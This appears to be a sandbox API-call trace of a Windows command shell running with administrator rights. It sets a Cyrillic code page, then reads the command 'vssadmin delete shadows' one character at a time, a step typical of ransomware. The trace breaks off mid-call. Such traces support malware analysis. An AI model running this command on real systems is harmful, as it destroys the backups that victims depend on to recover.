_wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0034.811] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0034.811] GetProcessHeap () returned 0x2f0000 [0034.811] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304640 | out: hHeap=0x2f0000) returned 1 [0034.811] GetProcessHeap () returned 0x2f0000 [0034.811] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x308900 [0034.811] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x20efd0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20ef80 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x20ef80*(hProcess=0x54, hThread=0x50, dwProcessId=0x9e0, dwThreadId=0x9e4)) returned 1 [0034.886] CloseHandle (hObject=0x50) returned 1 [0034.886] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0034.886] GetProcessHeap () returned 0x2f0000 [0034.886] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30c230 | out: hHeap=0x2f0000) returned 1 [0034.886] GetEnvironmentStringsW () returned 0x30aa10* [0034.886] GetProcessHeap () returned 0x2f0000 [0034.886] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x30b500 [0034.886] FreeEnvironmentStringsW (penv=0x30aa10) returned 1 [0034.886] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x76f50000 [0034.887] GetProcAddress (hModule=0x76f50000, lpProcName="NtQueryInformationProcess") returned 0x76fa14a0 [0034.887] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x20e888, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x20e888, ReturnLength=0x0) returned 0x0 [0034.887] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdf000, lpBuffer=0x20e8c0, nSize=0x380, lpNumberOfBytesRead=0x20e880 | out: lpBuffer=0x20e8c0*, lpNumberOfBytesRead=0x20e880*=0x380) returned 1 [0034.887] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0036.040] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x20eec8 | out: lpExitCode=0x20eec8*=0x0) returned 1 [0036.040] CloseHandle (hObject=0x54) returned 1 [0036.040] _vsnwprintf (in: _Buffer=0x20f138, _BufferCount=0x13, _Format="%08X", _ArgList=0x20eed8 | out: _Buffer="00000000") returned 8 [0036.040] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0036.040] GetProcessHeap () returned 0x2f0000 [0036.041] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30b500 | out: hHeap=0x2f0000) returned 1 [0036.041] GetEnvironmentStringsW () returned 0x30aa10* [0036.041] GetProcessHeap () returned 0x2f0000 [0036.041] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0e) returned 0x30eb10 [0036.041] FreeEnvironmentStringsW (penv=0x30aa10) returned 1 [0036.041] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0036.041] GetProcessHeap () returned 0x2f0000 [0036.041] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30eb10 | out: hHeap=0x2f0000) returned 1 [0036.041] GetEnvironmentStringsW () returned 0x30aa10* [0036.041] GetProcessHeap () returned 0x2f0000 [0036.041] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0e) returned 0x30eb10 [0036.041] FreeEnvironmentStringsW (penv=0x30aa10) returned 1 [0036.041] GetProcessHeap () returned 0x2f0000 [0036.041] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308900 | out: hHeap=0x2f0000) returned 1 [0036.041] DeleteProcThreadAttributeList (in: lpAttributeList=0x20ef98 | out: lpAttributeList=0x20ef98) [0036.042] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0036.042] _get_osfhandle (_FileHandle=1) returned 0xf4 [0036.042] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0036.042] _get_osfhandle (_FileHandle=1) returned 0xf4 [0036.042] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x49e0e194 | out: lpMode=0x49e0e194) returned 0 [0036.043] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.043] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x49e0e198 | out: lpMode=0x49e0e198) returned 0 [0036.043] GetConsoleOutputCP () returned 0x4e3 [0036.043] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x49e1bfe0 | out: lpCPInfo=0x49e1bfe0) returned 1 [0036.043] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0036.060] GetProcessHeap () returned 0x2f0000 [0036.060] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305b70 | out: hHeap=0x2f0000) returned 1 [0036.060] GetProcessHeap () returned 0x2f0000 [0036.060] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x309b00 | out: hHeap=0x2f0000) returned 1 [0036.060] GetProcessHeap () returned 0x2f0000 [0036.060] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1cd0 | out: hHeap=0x2f0000) returned 1 [0036.060] GetProcessHeap () returned 0x2f0000 [0036.060] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x309a80 | out: hHeap=0x2f0000) returned 1 [0036.060] GetProcessHeap () returned 0x2f0000 [0036.060] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3098a0 | out: hHeap=0x2f0000) returned 1 [0036.060] GetProcessHeap () returned 0x2f0000 [0036.060] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1ab0 | out: hHeap=0x2f0000) returned 1 [0036.060] GetProcessHeap () returned 0x2f0000 [0036.060] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306510 | out: hHeap=0x2f0000) returned 1 [0036.060] GetProcessHeap () returned 0x2f0000 [0036.060] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304610 | out: hHeap=0x2f0000) returned 1 [0036.060] GetProcessHeap () returned 0x2f0000 [0036.060] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3097e0 | out: hHeap=0x2f0000) returned 1 [0036.060] _vsnwprintf (in: _Buffer=0x49e26340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x20f3f8 | out: _Buffer="\r\n") returned 2 [0036.060] _get_osfhandle (_FileHandle=1) returned 0xf4 [0036.060] GetFileType (hFile=0xf4) returned 0x3 [0036.060] _get_osfhandle (_FileHandle=1) returned 0xf4 [0036.060] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x49e1c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0036.060] WriteFile (in: hFile=0xf4, lpBuffer=0x49e1c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f3c8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesWritten=0x20f3c8*=0x2, lpOverlapped=0x0) returned 1 [0036.060] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e0f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0036.060] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e1c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0036.061] _vsnwprintf (in: _Buffer=0x49e0eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x20f408 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0036.061] _vsnwprintf (in: _Buffer=0x49e0ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x20f408 | out: _Buffer=">") returned 1 [0036.061] _get_osfhandle (_FileHandle=1) returned 0xf4 [0036.061] GetFileType (hFile=0xf4) returned 0x3 [0036.061] _get_osfhandle (_FileHandle=1) returned 0xf4 [0036.061] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x49e1c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0036.061] WriteFile (in: hFile=0xf4, lpBuffer=0x49e1c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x20f3f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesWritten=0x20f3f8*=0x26, lpOverlapped=0x0) returned 1 [0036.061] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.061] GetFileType (hFile=0xe8) returned 0x3 [0036.061] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.061] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.061] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.061] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e320, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0036.061] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.061] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.061] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.061] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e322, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0036.061] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.061] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.061] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.061] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e324, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0036.061] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.061] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.061] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.061] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e326, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0036.061] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.061] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.061] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.062] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e328, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0036.062] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.062] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.062] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.062] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e32a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0036.062] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.062] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.062] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.062] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e32c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0036.062] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.062] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.062] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.062] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e32e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0036.062] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.062] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.062] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.062] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e330, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0036.062] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.062] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.062] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.062] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e332, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0036.062] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.062] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.062] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.062] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e334, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0036.062] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.062] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.062] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.062] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e336, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0036.062] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.062] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.062] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.062] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e338, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1 [0036.063] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.063] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.063] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.063] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e33a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0036.063] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.063] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.063] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.063] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e33c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0036.063] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.063] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.063] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.063] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e33e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0036.063] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.063] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.063] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.063] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e340, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0036.063] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.063] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.063] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.063] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e342, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0036.063] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.063] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.063] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.063] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e344, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0036.063] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.063] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.063] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.063] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e346, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0036.063] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.063] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.063] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.063] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e348, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0036.063] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.064] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.064] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.064] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e34a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0036.064] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.064] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0036.064] ReadFile (in: hFile=0xe8, lpBuffer=0x49e1c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f6f8, lpOverlapped=0x0 | out: lpBuffer=0x49e1c320*, lpNumberOfBytesRead=0x20f6f8*=0x1, lpOverlapped=0x0) returned 1 [0036.064] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x49e1c320, cbMultiByte=1, lpWideCharStr=0x49e1e34c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0036.064] _get_osfhandle (_FileHandle=0) returned 0xe8 [0036.064] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, 